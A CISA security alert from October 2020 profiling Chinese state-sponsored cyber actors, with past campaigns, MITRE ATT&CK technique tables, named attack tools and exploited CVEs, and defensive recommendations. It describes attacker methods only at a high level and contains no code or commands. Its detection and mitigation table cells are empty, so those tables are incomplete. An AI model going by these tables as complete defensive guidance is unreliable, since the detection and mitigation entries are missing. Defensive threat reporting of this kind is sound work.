Original release date: October 1, 2020
This Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework. See the ATT&CK for Enterprise framework for all referenced threat actor techniques.
In light of heightened tensions between the United States and China, the Cybersecurity and Infrastructure Security Agency (CISA) is providing specific Chinese government and affiliated cyber threat actor tactics, techniques, and procedures (TTPs) and recommended mitigations to the cybersecurity community to assist in the protection of our Nation’s critical infrastructure. In addition to the recommendations listed in the Mitigations section of this Alert, CISA recommends organizations take the following actions.
- Adopt a state of heightened awareness. Minimize gaps in personnel availability, consistently consume relevant threat intelligence, and update emergency call trees.
- Increase organizational vigilance. Ensure security personnel monitor key internal security capabilities and can identify anomalous behavior. Flag any known Chinese indicators of compromise (IOCs) and TTPs for immediate response.
- Confirm reporting processes. Ensure personnel know how and when to report an incident. The well-being of an organization’s workforce and cyber infrastructure depends on awareness of threat activity. Consider reporting incidents to CISA to help serve as part of CISA’s early warning system (see the Contact Information section below).
- Exercise organizational incident response plans. Ensure personnel are familiar with the key steps they need to take during an incident. Do they have the accesses they need? Do they know the processes? Are various data sources logging as expected? Ensure personnel are positioned to act in a calm and unified manner.
China Cyber Threat Profile
China has a history of using national military and economic resources to leverage offensive cyber tactics in pursuing its national interests. The “Made in China 2025” 10-year plan outlines China’s top-level policy priorities., China may seek to target the following industries deemed critical to U.S. national and economic interests: new energy vehicles, next generation information technology (IT), biotechnology, new materials, aerospace, maritime engineering and high-tech ships, railway, robotics, power equipment, and agricultural machinery. China has exercised its increasingly sophisticated capabilities to illegitimately obtain U.S. intellectual property (IP), suppress both social and political perspectives deemed dangerous to China, and harm regional and international opponents.
The U.S. Intelligence Community and various private sector threat intelligence organizations have identified the Chinese People’s Liberation Army (PLA) and Ministry of State Security (MSS) as driving forces behind Chinese state-sponsored cyberattacks–either through contractors in the Chinese private sector or by the PLA and MSS entities themselves. China continues to engage in espionage-related activities that include theft of sensitive information such as innovation capital, IP, and personally identifiable information (PII). China has demonstrated a willingness to push the boundaries of their activities to secure information critical to advancing their economic prowess and competitive advantage.
Chinese Cyber Activity
According to open-source reporting, offensive cyber operations attributed to the Chinese government targeted, and continue to target, a variety of industries and organizations in the United States, including healthcare, financial services, defense industrial base, energy, government facilities, chemical, critical manufacturing (including automotive and aerospace), communications, IT, international trade, education, videogaming, faith-based organizations, and law firms.
Additionally, numerous Department of Justice (DOJ) indictments over several years provide evidence to suggest Chinese threat actors continuously seek to illegally obtain and exfiltrate U.S. IP. Their targets also include western companies with operations inside China.
Public reporting that associates Chinese actors with a range of high-profile attacks and offensive cyber activity includes:
- February 2013 – Cyber Threat Intelligence Researchers Link Advanced Persistent Threat (APT) 1 to China: a comprehensive report publicly exposed APT1 as part of China’s military cyber operations and a multi-year effort that exfiltrated IP from roughly 141 companies spanning 20 major industries. APT1 established access to the victims’ networks and methodically exfiltrated IP across a large range of industries identified in China’s 12th 5-Year Plan. A year later, the DOJ indicted Chinese cyber threat actors assigned to PLA Unit 61398 for the first time (also highlighted in the report).
- April 2017 – Chinese APTs Targeting IP in 12 Countries: CISA announced Chinese state-backed APTs carried out a multi-year campaign of cyber-enabled IP theft that targeted global technology service providers and their customers. The threat actors leveraged stolen administrative credentials (local and domain) and placed sophisticated malware on critical systems in an effort to steal the IP and sensitive data of companies located in at least 12 countries.
- December 2018 – Chinese Cyber Threat Actors Indicted for Compromising Managed Service Providers (MSPs): DOJ indicted two Chinese cyber threat actors believed to be associated with APT10, who targeted MSPs and their large customer base through phishing and spearphishing campaigns aimed at exfiltrating sensitive business data and, possibly, PII. CISA also briefed stakeholders on Chinese APT groups who targeted MSPs and their customers to steal data and further operationalize commercial and economic espionage.
- February 2020 – China’s Military Indicted for 2017 Equifax Hack: DOJ indicted members of China’s PLA for stealing large amounts of PII and IP. The Chinese cyber threat actors exploited a vulnerability in the company’s dispute resolution website to enter the network, conduct reconnaissance, upload malware, and steal credentials to extract the targeted data. The breach impacted roughly half of all American citizens and stole Equifax’s trade secrets.
- May 2020 – China Targets COVID-19 Research Organizations: the Federal Bureau of Investigation (FBI) and CISA reported the targeting and compromise of U.S. organizations conducting COVID-19-related research by cyber actors affiliated with China. Large-scale password spraying campaigns were a commonly observed tactic in illicitly obtaining IP related to vaccines, treatments, and testing from networks and personnel affiliated with COVID-19-related research.,
Common TTPs of Publicly Known Chinese Threat Actors
The section below provides common, publicly known, TTPs employed by Chinese threat actors, which map to the MITRE ATT&CK framework. Where possible, the tables include actions for detection and mitigation. This section is not exhaustive and does not detail all TTPs or detection and mitigation actions.
Chinese threat actors commonly use the techniques listed in table 1 to achieve reconnaissance (Technical Information Gathering [TA0015]), staging (Stage Capabilities [TA0026]), and testing (Test Capabilities [TA0025]) before executing an attack. PRE-ATT&CK techniques can be difficult to detect and mitigate, however, defenders should be aware of the use of these techniques.
Table 1: Chinese threat actor PRE-ATT&CK techniques
|Acquire and/or Use 3rd Party Software Services [T1330]||Staging and launching attacks from software as a service solutions that cannot be easily tied back to the APT|
|Compromise 3rd Party Infrastructure to Support Delivery [T1334]||Compromising infrastructure owned by other parties to facilitate attacks (instead of directly purchasing infrastructure)|
|Domain Registration Hijacking [T1326]||Changing the registration of a domain name without the permission of its original registrant and then using the legitimate domain as a launch point for malicious purposes|
|Acquire Open-Source Intelligence (OSINT) Data Sets and Information [T1247]||Gathering data and information from publicly available sources, including public-facing websites of the target organization|
|Conduct Active Scanning [T1254]||Gathering information on target systems by scanning the systems for vulnerabilities. Adversaries are likely using tools such as Shodan to identify vulnerable devices connected to the internet|
|Analyze Architecture and Configuration Posture [T1288]||Analyzing technical scan results to identify architectural flaws, misconfigurations, or improper security controls in victim networks|
|Upload, Install, and Configure Software/Tools [T1362]||Placing malware on systems illegitimately for use during later stages of an attack to facilitate exploitability and gain remote access|
Enterprise ATT&CK TTPs
Chinese threat actors often employ publicly known TTPs against enterprise networks. To orchestrate attacks, they use commonly implemented security testing tools and frameworks, such as:
- Cobalt Strike and Beacon
- PowerShell Empire
- China Chopper Web Shell
Table 2 lists common, publicly known, TTPs used by Chinese threat actors against enterprise networks and provides options for detection and mitigation based on the MITRE ATT&CK framework.
Table 2: Common Chinese threat actor techniques, detection, and mitigation
|Technique / Sub-Technique||Detection||Mitigation|
|Obfuscated Files or Information [T1027]||
|Phishing: Spearphishing Attachment [T1566.001] and Spearphishing Link [T1566.002]||
|System Network Configuration Discovery [T1016]||
|Command and Scripting Interpreter: Windows Command Shell [T1059.003]||
|User Execution: Malicious File [T1204.002]||
|Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder [T1547.001]||
|Command and Scripting Interpreter: PowerShell [T1059.001]||
|Hijack Execution Flow: DLL Side-Loading [T1574.002]||
|Ingress Tool Transfer [T1105]||
|Remote System Discovery [T1018]||
|Software Deployment Tools [T1072]||
|Brute Force: Password Spraying [T1110.003]||
|Network Service Scanning [T1046]||
|Email Collection [T1114]||
|Proxy: External Proxy [T1090.002]||
|Drive-by Compromise [T1189]||
|Server Software Component: Web Shell [T1505.003]||
|Application Layer Protocol: File Transfer Protocols [T1071.002] and DNS [T1071.004]||
Additional APT Activity
The TTPs listed above have been repeatedly used across the spectrum of Chinese threat actors. The mitigations referenced in this alert can help reduce vulnerability to these TTPs; however, defenders should also maintain heightened awareness of threats actors that are more innovative in their approach, making it difficult to detect and respond to compromise. Publicly reported examples include:
- APT3 (known as UPS Team) is known for deploying zero-day attacks that target Internet Explorer, Firefox, and Adobe Flash Player. The group’s custom implants and changing Command and Control (C2) infrastructure make them difficult to track. APT3 exploits use Rivest Cypher 4 (RC4) encryption to communicate and bypass address space layout randomization (ASLR)/Data Execution Prevention (DEP) by using Return Oriented Programming (ROP) chains.
- APT10 (known as MenuPass Group) has established accessed to victim networks through compromised service providers, making it difficult for network defenders to identify the malicious traffic.
- APT19 (known as Codoso and Deep Panda) is known for developing custom Rich Text Format (RTF) and macro-enabled Microsoft Office documents for both implants and payloads. The group has backdoored software, such as software serial generators, and has an elite use of PowerShell for C2 over Hyper Text Transfer Protocol (HTTP)/Hyper Text Transfer Protocol Secure (HTTPS).
- APT40 (known as Leviathan) has targeted external infrastructure with success, including internet-facing routers and virtual private networks.
- APT41 (known as Double Dragon) has exploited vulnerabilities in Citrix NetScaler/ADC, Cisco routers, and Zoho ManageEngine Desktop Central to compromise victims.
The following list provides actionable technical recommendations for IT security professionals to reduce their organization’s overall vulnerability. These recommendations are not exhaustive; rather they focus on the actions that will greatly reduce stakeholders’ attack surface.
- Patch systems and equipment promptly and diligently. Establishing and consistently maintaining a thorough patching cycle continues to be the best defense against adversary TTPs. Focus on patching critical and high vulnerabilities that allow for remote code execution or denial-of-service on externally-facing (i.e., internet) equipment. Certain vulnerabilities—including CVE-2012-0158 in Microsoft products , CVE-2019-19781 in Citrix devices , and CVE-2020-5902 in BIG-IP Traffic Management User Interface —have presented APTs with prime targets to gain initial access. Chinese APTs often use existing exploit code to target routinely exploited vulnerabilities , which present an opportunistic attack that requires limited resources. See table 3 for patch information on CVEs that have been routinely exploited by Chinese APTs.
Table 3: Patch information for vulnerabilities routinely exploited by Chinese APT actors
|Vulnerability||Vulnerable Products||Patch Information|
Microsoft Office 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1; Office 2003 Web Components SP3; SQL Server 2000 SP4, 2005 SP4, and 2008 SP2, SP3, and R2; BizTalk Server 2002 SP1; Commerce Server 2002 SP4, 2007 SP2, and 2009 Gold and R2; Visual FoxPro 8.0 SP1 and 9.0 SP2; and Visual Basic 6.0
- Implement rigorous configuration management programs. Audit configuration management programs to ensure they can track and mitigate emerging threats. Review system configurations for misconfigurations and security weaknesses. Implementing a robust configuration and patch management program hinders sophisticated APT operations by limiting the effectiveness of opportunistic attacks.
- Disable unnecessary ports, protocols, and services. Review network security device logs and determine whether to shut off unnecessary ports and protocols. Monitor common ports and protocols for C2 activity. Turn off or disable any unnecessary services or functionality within devices (e.g., universal plug and play [UPnP], PowerShell).
- Enhance monitoring of network and email traffic. Review network signatures and indicators for focused operations activities, monitor for new phishing themes, and adjust email rules accordingly. Follow best practices of restricting attachments via email. Ensure that log information is aggregated and correlated to enable maximum detection capabilities, with a focus on monitoring for account misuse.
- Use protection capabilities to stop malicious activity. Implement antivirus software and other endpoint protection capabilities to automatically detect and prevent malicious files from executing. Use network intrusion detection and prevention systems to identify and prevent commonly employed adversarial malware and limit nefarious data transfers.
CISA encourages recipients of this report to contribute any additional information that they may have related to this threat. For any questions related to this report, please contact CISA at:
- 1-888-282-0870 (From outside the United States: +1-703-235-8832)
- Central@cisa.dhs.gov (UNCLASS)
CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on the CISA homepage at http://www.us-cert.cisa.gov/.
-  White House Publication: How China’s Economic Aggression Threatens the Technologies and Intellectual Property of the United States and the World
-  Congressional Research Services: ‘Made in China 2025’ Industrial Policies: Issues for Congress
-  Council on Foreign Relations: Is ‘Made in China 2025’ a Threat to Global Trade
-  Mandiant: APT1 Exposing One of China’s Cyber Espionage Units
-  U.S. Department of Justice (DOJ) Press Release: U.S. Charges Five Chinese Military Hackers for Cyber Espionage Against U.S. Corporations and a Labor Organization for Commercial Advantage
-  CISA Alert TA17-117A: Intrusions Affecting Multiple Victims Across Multiple Sectors
-  DOJ Press Release: Deputy Attorney General Rod J. Rodenstein Announces Charges Against Chinese Hackers
-  CISA Awareness Briefing: Chinese Cyber Activity Targeting Managed Service Providers
-  DOJ Press Release: Deputy Attorney General William P. Barr Announces Indictment of Four Members of China’s Military for Hacking into Equifax
-  CISA Press Release: FBI and CISA Warn Against Chinese Targeting of COVID-19 Research Organizations
-  CISA Alert AA20-126A: APT Groups Target Healthcare and Essential Services
-  CISA Current Activity (CA): Chinese Malicious Cyber Activity
-  FireEye Advanced Persistent Threat Groups
-  MITRE ATT&CK: APT3
-  MITRE ATT&CK: APT19
-  MITRE ATT&CK: APT41
-  CISA Alert AA20-133A: Top 10 Routinely Exploited Vulnerabilities
-  CISA Alert AA20-020A: Critical Vulnerability in Citrix Application Delivery Controller, Gateway, and SD-WAN WANOP
-  CISA CA: F5 Releases Security Advisory for BIP-IP TMUI RCE Vulnerability, CVE-2020-5902
-  CISA Alert AA20-133A: Top 10 Routinely Exploited Vulnerabilities
- October 1, 2020: Initial Version